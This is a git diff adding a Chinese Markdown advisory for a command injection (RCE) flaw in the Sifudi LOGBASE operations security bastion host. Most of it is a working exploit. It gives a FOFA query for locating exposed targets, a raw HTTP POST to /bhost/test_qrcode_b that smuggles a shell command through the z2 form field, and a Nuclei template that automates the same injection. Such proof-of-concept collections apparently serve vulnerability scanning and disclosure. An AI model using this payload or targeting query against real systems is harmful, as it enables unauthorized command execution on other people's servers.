diff --git a/思福迪运维安全管理系统RCE漏洞.md b/思福迪运维安全管理系统RCE漏洞.md
new file mode 100644
index 0000000..e711c4f
--- /dev/null
+++ b/思福迪运维安全管理系统RCE漏洞.md
@@ -0,0 +1,61 @@
+## 思福迪运维安全管理系统RCE漏洞
+思福迪运维安全管理系统是思福迪开发的一款运维安全管理堡垒机。思福迪运维安全管理系统 test_qrcode_b 路由存在命令执行漏洞，可以导致服务器被攻击者远控。
+
+## 影响版本
+```
+思福迪-LOGBASE
+```
+
+## fofa
+```
+app="思福迪-LOGBASE"
+```
+
+## poc
+```
+POST /bhost/test_qrcode_b HTTP/1.1
+Host: BaseURL
+User-Agent: Go-http-client/1.1
+Content-Length: 23
+Accept-Encoding: gzip
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Referer: BaseURL
+
+z1=1&z2="|id;"&z3=bhost
+```
+
+## nuclei poc
+```
+
+id: SAFETY-test_qrcode_b-rce
+
+info:
+  name: 思福迪 运维安全管理系统 test_qrcode_b 远程命令执行漏洞
+  author: fgz
+  severity: critical
+  description: '思福迪运维安全管理系统是思福迪开发的一款运维安全管理堡垒机。思福迪运维安全管理系统 test_qrcode_b 路由存在命令执行漏洞，可以导致服务器被攻击者远控。'
+  tags: 2023,SAFETY,LogBase,思福迪,rce
+  metadata:
+    max-request: 3
+    fofa-query: app="思福迪-LOGBASE"
+    verified: true
+
+http:
+  - method: POST
+    path:
+      - "{{BaseURL}}/bhost/test_qrcode_b"
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+      Connection: close
+      Referer: "{{BaseURL}}"
+      Accept-Encoding: gzip
+    body: 'z1=1&z2="|id;"&z3=bhost'
+    unsafe: true
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code == 200 && contains(body,'uid')"
+
+```
+